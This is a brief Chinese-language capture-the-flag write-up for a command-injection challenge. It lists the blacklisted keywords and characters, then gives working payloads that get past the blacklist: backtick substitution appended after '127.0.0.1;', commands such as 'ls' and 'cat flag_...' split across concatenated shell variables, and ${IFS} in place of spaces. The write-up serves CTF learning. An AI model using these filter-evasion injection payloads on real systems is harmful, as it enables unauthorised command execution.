地址:http://198.13.45.199:5005/
明显是一道命令执行的题目。
来说一下被ban的内容都有啥。
ls、cat、flag、php、>、| 以及数字点和空格
通过反引号包裹whoami后成功执行。
此时需要通过a="l";b="s";c=$a$b;$c来执行ls命令。
同时还需要包含在反引号内
127.0.0.1;`a="l";b="s";c=$a$b;$c`
flag文件近在咫尺。
flag_ae8e4cd6ce3b5
直接访问之后被403拒绝,只能通过cat读取了。
127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`
因为flag和cat不能出现所以我们进行了一个拼接,而${IFS}是对空格进行一个取代作用。